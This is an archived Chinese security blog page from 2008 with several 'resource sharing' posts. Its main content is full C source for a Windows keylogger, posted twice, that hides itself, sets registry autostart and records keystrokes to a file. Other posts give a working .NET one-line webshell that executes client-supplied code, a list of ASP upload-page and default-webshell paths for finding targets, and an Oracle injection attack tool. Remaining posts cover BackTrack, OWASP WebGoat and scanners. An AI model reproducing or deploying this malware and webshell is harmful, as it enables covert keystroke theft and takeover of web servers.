存档

‘资源共享’ 分类的存档

共享一个键盘记录的源码

2008年10月20日 没有评论 126 views

PS:很早的一个源码了,大家拿去玩玩吧

#include <windows.h>
#include <stdio.h>
#include <time.h>


int main(void)
{
// Hide consolewindows
   HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
   ShowWindow(hwnd,SW_HIDE);

//Autostart Keylogger on systemstartup
  HKEY hkey;
  HKEY KEY = HKEY_LOCAL_MACHINE;
  char place[100]= {"Software\\Microsoft\\Windows\\CurrentVersion\\Run"};
  char name[100]= {"Autostart"};
  char value[100]= {"C:\\Programme\\cLog.exe"};

  RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
  RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
  RegCloseKey(hkey);
//------------------------------------------------------------------------------

int idex;
char *buffer;
long LogLength;
long len;


FILE *log;
   log=fopen("c:\\log.txt","a+");
// Check time and Date and write to file
   time_t theTime=time(0);
   fputs("\nLogged keys by cLog at: ", log);
   fputs(ctime(&theTime),log);
// some advertisement
   fputs("-------------------------------------------------\n",log);
   fputs("~~~~~~~ by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
   fputs("-------------------------------------------------\n",log);
   fputs("\n",log);
   fclose(log);





// logging keys
log=fopen("c:\\log.txt","a+");


           short character;
             while(1)
             {
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        {  
                            FILE *log;
                            log=fopen("C:\\log.txt","a+");
                            if(log==NULL)
                            {
                                    return 1;
                            }            
                            if(log!=NULL)
                            {        
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }        
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }
                                    else
>                                    {
                                        switch(character)
                                        {
                                              case 187:
                                              fputc('+',log);
                                              fclose(log);
                                              break;
                                              case 188:
                                              fputc(',',log);
                                              fclose(log);
                                              break;
                                              case 189:
                                              fputc('-',log);
                                              fclose(log);
                                              break;
                                              case 190:
                                              fputc('.',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD0:
                                              fputc('0',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD2:
                   &nbs
p;                          fputc('2',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD9:
          &nb
sp;                                   fputc('9',log);
                                              fclose(log);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("\r\n[CAPS LOCK]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_SHIFT:
                                              fputs("\r\n[SHIFT]\r\n",log);
                                              fclose(log);
                                              case VK_SPACE:
                                              fputc(' ',log);
                                              fclose(log);
                                              break;    
                                              case VK_CONTROL:
                                              fputs("\r\n[CTRL]\r\n",log);
                                              fclose(log);
                                              break;
                                              break;                                            
                                              case VK_RETURN:
                                              fputs("\r\n[RETURN]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_BACK:
                                              fputs("\r\n[BACKSPACE]\r\n",log);
                                              fclose(log);
                                      &
nbsp;       break;
                                              case VK_TAB:
                                              fputs("\r\n[TAB]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_DELETE:
                                              fputs("\r\n[DELETE]\r\n",log);
                                              fclose(log);
                                              break;
                                              default:
                                              fclose(log);
                                              break;
                                       }        
                                  }    
                             }        
                   }    
               }                  
           FILE *log;
           log=fopen("c:\\log.txt","rb");
           fseek(log,0,SEEK_END); //search EOF
           len=ftell(log); //goto end
           if(len>=LogLength) {
             fseek(log,0,SEEK_SET);
             buffer=(char *)malloc(len);
             idex=fread(buffer,1,len,log);//
             buffer[idex] = '\0'; //terminate
             fclose(log);
             log=fopen("c:\\log.txt","w");
             }
           
            fclose(log);
}
            free (buffer);
}

// Developed by CC_IP powered by www.excluded.org
#include <windows.h>
#include <stdio.h>
#include <time.h>


int main(void)
{
// Hide consolewindows
   HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
   ShowWindow(hwnd,SW_HIDE);

//Autostart Keylogger on systemstartup
  HKEY hkey;
  HKEY KEY = HKEY_LOCAL_MACHINE;
  char place[100]= {"Software\\Microsoft\\Windows\\CurrentVersion\\Run"};
  char name[100]= {"Autostart"};
  char value[100]= {"C:\\Programme\\cLog.exe"};

  RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
  RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
  RegCloseKey(hkey);
//------------------------------------------------------------------------------

int idex;
char *buffer;
long LogLength;
long len;


FILE *log;
   log=fopen("c:\\log.txt","a+");
// Check time and Date and write to file
   time_t theTime=time(0);
   fputs("\nLogged keys by cLog at: ", log);
   fputs(ctime(&theTime),log);
// some advertisement
   fputs("-------------------------------------------------\n",log);
   fputs("~~~~~~~ by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
   fputs("-------------------------------------------------\n",log);
   fputs("\n",log);
   fclose(log);





// logging keys
log=fopen("c:\\log.txt","a+");


           short character;
             while(1)
 &nbs
p;           {
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        {  
                            FILE *log;
                            log=fopen("C:\\log.txt","a+");
                            if(log==NULL)
                            {
                                    return 1;
                            }            
                            if(log!=NULL)
                            {        
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }        
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,log);
                                          fclose(log);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case 187:
                                              fputc('+',log);
                                              fclose(log);
                                              break;
                                              case 188:
        
                                      fputc(',',log);
                                              fclose(log);
                                              break;
                                              case 189:
                                              fputc('-',log);
                                              fclose(log);
                                              break;
                                              case 190:
                                              fputc('.',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD0:
                                              fputc('0',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD4:
 &
nbsp;                                            fputc('4',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',log);
                                              fclose(log);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',log);
                                              fclose(log);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("\r\n[CAPS LOCK]\r\n",log);
                                              fclose(log);
                                              break;
                                      &nb
sp;       case VK_SHIFT:
                                              fputs("\r\n[SHIFT]\r\n",log);
                                              fclose(log);
                                              case VK_SPACE:
                                              fputc(' ',log);
                                              fclose(log);
                                              break;    
                                              case VK_CONTROL:
                                              fputs("\r\n[CTRL]\r\n",log);
                                              fclose(log);
                                              break;
                                              break;                                            
                                              case VK_RETURN:
                                              fputs("\r\n[RETURN]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_BACK:
                                              fputs("\r\n[BACKSPACE]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_TAB:
                                              fputs("\r\n[TAB]\r\n",log);
                                              fclose(log);
                                              break;
                                              case VK_DELETE:
                                              fputs("\r\n[DELETE]\r\n",log);
                                              fclose(log);
                
                              break;
                                              default:
                                              fclose(log);
                                              break;
                                       }        
                                  }    
                             }        
                   }    
               }                  
           FILE *log;
           log=fopen("c:\\log.txt","rb");
           fseek(log,0,SEEK_END); //search EOF
           len=ftell(log); //goto end
           if(len>=LogLength) {
             fseek(log,0,SEEK_SET);
             buffer=(char *)malloc(len);
             idex=fread(buffer,1,len,log);//
             buffer[idex] = '\0'; //terminate
             fclose(log);
             log=fopen("c:\\log.txt","w");
             }
           
            fclose(log);
}
            free (buffer);
}

// Developed by CC_IP powered by www.excluded.org

分类: 资源共享 标签:

公布一批上传页查询关键

2008年10月20日 没有评论 113 views

/eWebEditor/upload.asp #eWebEditor上传页面
/editor/upload.asp #eWebEditor上传页面
/bbs/upfile.asp #动网论坛上传页面
/forum/upfile.asp #动网论坛上传页面
/dvbbs/upfile.asp #动网论坛上传页面
/upfile_soft.asp #动力管理系统上传页面
/upload.asp?action=upfile #乔客6.0上传页面
/upfile.asp #动网论坛上传页面
/bbs/down_addsoft.asp #动网论坛插件上传页面
/bbs/down_picupfile.asp #动网论坛插件上传页面
/down_picupload.asp #动网论坛插件上传页面
/admin/admin_upfile.asp #管理员后台上传页面
/admin/upfile.asp #管理员后台上传页面
/admin/upload.asp #管理员后台上传页面
/admin/uploadfaceok.asp #尘缘上传页面
/news/admin/upfile.asp #新闻管理上传页面
/admin_upfile.asp #飞龙文章管理系统

/user_upfile.asp #飞龙文章管理系统
/upload_flash.asp #秋叶购物商城上传页面
/Saveannounce_upload.asp #购物中心上传页面
/UploadFace.asp #沸腾展望新闻系统

/bbs/diy.asp #Domian3.0默认木马
/UploadSoft/diy.asp #Domian3.0 默认木马
/diy.asp #Domian3.0默认木马
/upload/upload.asp #某某文章管理系统
/mybbs/saveup.asp #MYBBS论坛上传页面
/dxxobbs/upload.asp #DxxoBBS论坛上传页面
/img_upfile.asp #任我飞扬驿站上传页面
/Upfile_SoftPic.asp #动力管理系统上传页面
/upfile_flash.asp #秋叶购物商城上传页面

 

分类: 资源共享 标签:

Linx Oracle 自动攻击器

2008年10月19日 没有评论 129 views

来源:linx2008
* 利用条件:
1.oracle服务器可以读取当前php脚本
*2.要运行系统命令,请先在oralce服务器创建 sys.LinxRunCMD() 函数

提示:
要获得cookie,请运行
 

javascript:document.cookie=window.prompt("Edit cookie:",document.cookie);void(0);

* 注射方式:为必填内容,注射语句用"(<**>)"代替。
使用步骤:

eg:如果你的注射地址是 http://host/test.jsp?action=read&id=123,则
1.输入"注射地址",
2.点击"数值型" or "字符型型",此时自动生成 注射方式:
 

http://host/test.jsp?action=read&id=123 and chr(1) not in (<**>)

3.如果你没有创建函数,请先点击“创建函数”
4.选择操作:运行命令 or读取文件
5.输入命令,选择"生成语句",再点击 运行语句
 

下载地址:点击下载

分类: 资源共享 标签:

BackTrack 3 正式版 迅雷高速下载

2008年10月18日 没有评论 1,008 views

Description: CD Image
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: Click here

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: Click here

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: Click here

分类: 资源共享 标签:

OWASP WebGoat + WebScarab

2008年10月18日 没有评论 276 views

一、OWASP WebScarab Project
a tool for performing all types of security testing on web applications and web services

下载地址:OWASP Source Code Center at Sourceforge

安装方法:
Linux: java -jar ./webscarab-selfcontained-[numbers].jar
Windows: double-click the installer jar file

A Mac OS X package of the latest version can usually be found on Corsaire's download page.

You can also try the Java Web Start version, which was signed by Rogan Dawes.

演示&教程下载地址:
1. http://sourceforge.net/project/showfiles.php?group_id=233075&package_id=286265
2. http://yehg.net/lab/pr0js/training/webscarab.php

截图:

详情:http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

二、OWASP WebGoat Project
an online training environment for hands-on learning about application security
鬼仔注:也是WebScarab的那些演示中用的那套系统。

下载地址:Google code downloads

安装方法:
* Double-click on webgoat.bat - a Tomcat command window starts
* Browse to http://localhost/WebGoat/attack

用户手册:WebGoat User and Install Guide

演示&教程下载地址:http://yehg.net/lab/pr0js/training/webgoat.php

截图:

详情:http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

分类: 资源共享 标签:

BackTrack 3 (BT3)中文版,可显示中文文件及文件夹(二)

2008年10月17日 没有评论 4,816 views

来源:Chinadu`s Blog

要实现bt3的完全中文化,只要在原版bt3的基础上加上huatux的包,再加上一个local包:

这样启动bt3后(我的是bt3 beta3版,final版应该一样,未测)就可以看到中文文件夹及文件了,效果图如下:

 

 

 

分类: 资源共享 标签:

Backtrack 3(BT3)中文版,可显示中文文件及文件夹(一)

2008年10月17日 没有评论 1,047 views

来源:Chinadu`s Blog

网上可以找到两个bt3的中文包,一个20m左右(分四个文件),一个60m左右(一个文件),但两个包都不能实现完整的中文化,都不能显示中文文件夹,对FAT32磁盘里的中文是显示“?????”,NTFS磁盘里的中文索性不显示。
    经过一个晚上的研究,终于可以使bt3正常显示中文文件夹及文件了。
    bt3是基于slax的linux系统,在国内有个fanx的是做slax汉化的,最新版是FanX2,我所要做的就是把FanX2里的中文包移植到bt3里面(我所做的是基于bt3 beta 3,在bt3 final里应该也可以用,大家可以试试),把以下这个lzm文件放到“BT3\modules”下就OK了。

不过这个包由于是移植自FanX2的,所以界面也是FanX2的,不过功能全部是bt3的,下面是界面示意图:

 

用这个包的好处是这是从最新的slax中文版里提取的,视频解码等都非常齐备,可以直接播放rmvb,至于其他功能,大家就自己去发现发现吧。
至于有网友说无法启动之类的,应该是由于加载了过多的lzm包,或错误的lzm包等引起的,大家自己研究一下吧。

下载文件:点击下载

分类: 资源共享 标签:

SCRT Mini MySqlat0r-Java写的mysql注入检测工具

2008年10月15日 没有评论 118 views

Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.
http://www.scrt.ch/imagesite/sqlator.jpg
Mini MySqlat0r can be used on any platform running the Java environment and is distributed under GPL licence.
Prerequisites
The Java runtime environment is necessary to use Mini MySqlat0r :
- Java JRE
Downloads
version 0.3
Program      mms_0_3.jar
Source code      mms_src.jar
Documentation      mms_manual.pdf

详情查看:http://www.scrt.ch/pages_en/minimysqlator.html

分类: 资源共享 标签:

新的远程OS指纹被动判别工具-p0f

2008年10月15日 没有评论 45 views

来源:3w417

p0f 是继Nmap和Xprobe2之后又一款远程操作系统被动判别工具。它支持:

1. 反连SYN 模式
2. 正连SYN+ACK 模式
3. 空连RST+ 模式
4. 碎片ACK模式

p0f比较有特色的是它还可以探测:

1. 是否运行于防火墙之后
2. 是否运行于NAT模式
3. 是否运行于负载均衡模式
4. 远程系统已启动时间
5. 远程系统的DSL和ISP信息等

输出类似的报表:

192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!)
-> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)

下载地址:http://lcamtuf.coredump.cx/p0f/

分类: 资源共享 标签:

开机svchost进程CPU 占用率过高问题

2008年10月15日 没有评论 95 views

最近总是发现开机后有一个svchost进程占用CPU非常高,大概有30秒左右系统都很慢,疑神疑鬼的以为是中了木马,查了很久都没有问题。

今天终于解决了!装这个补丁:http://go.microsoft.com/fwlink/?LinkID=91237

装了之后重启感觉好多了,错觉? :)

PS:
这个补丁叫:windowsupdateagent30-x86.exe
补丁详细介绍看这里:http://msdn.microsoft.com/en-us/library/aa387285.aspx

分类: 资源共享 标签:

SCRT Webshag web服务器审计工具(Python)

2008年10月15日 没有评论 74 views

SCRT Webshag
IntroductionWebshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning or file fuzzing

 

Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest). In addition to that it proposes innovative IDS evasion functionalities aimed at making correlation between request more complicated (e.g. use a different random per request HTTP proxy server).

It also provides innovative functionalities like the capability of retrieving the list of domain names hosted on a target machine and file fuzzing using dynamically generated filenames (in addition to common list-based fuzzing).

Webshag URL scanner and file fuzzer are aimed at reducing the number of false positives and thus producing cleaner result sets. For this purpose, webshag implements a web page fingerprinting mechanism resistant to content changes. This fingerprinting mechanism is then used in a false positive removal algorithm specially aimed at dealing with "soft 404" server responses. Webshag provides a full featured and intuitive graphical user interface as well as a text-based command line interface and is available for Linux and Windows platforms, under GPL license.

Requirements
To be fully functional, webshag requires the following elements:

- Python 2.5 or ActivePython 2.5
- wxPython GUI toolkit
- Nmap port scanner (for port scanning module only)
- A valid Live Search AppID (for domain information module only)

Note that Windows installer does not require Python or wxPython.
Downloads
version 1.00
Linux (tarball)

ws100_linux.tar.gz
Windows (installer)

ws100_win.exe
Source only (no database)

ws100_src.tar.gz
User Manual (EN)

ws100_manual.pdf
FeedbackPlease report bugs and comments to
http://www.scrt.ch/imagesite/mail_webshag.jpg

CreditsWebshag is distributed with Nikto vulnerability database.
Windows installer built using py2exe and Inno Setup.

分类: 资源共享 标签:

新型 .net 一句话及客户端

2008年10月14日 没有评论 78 views

作者:cnqing

软件说明:
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发

截图:




下载地址:
http://www.cncert.net/up_files/soft/aspxclient.rar

分类: 资源共享 标签: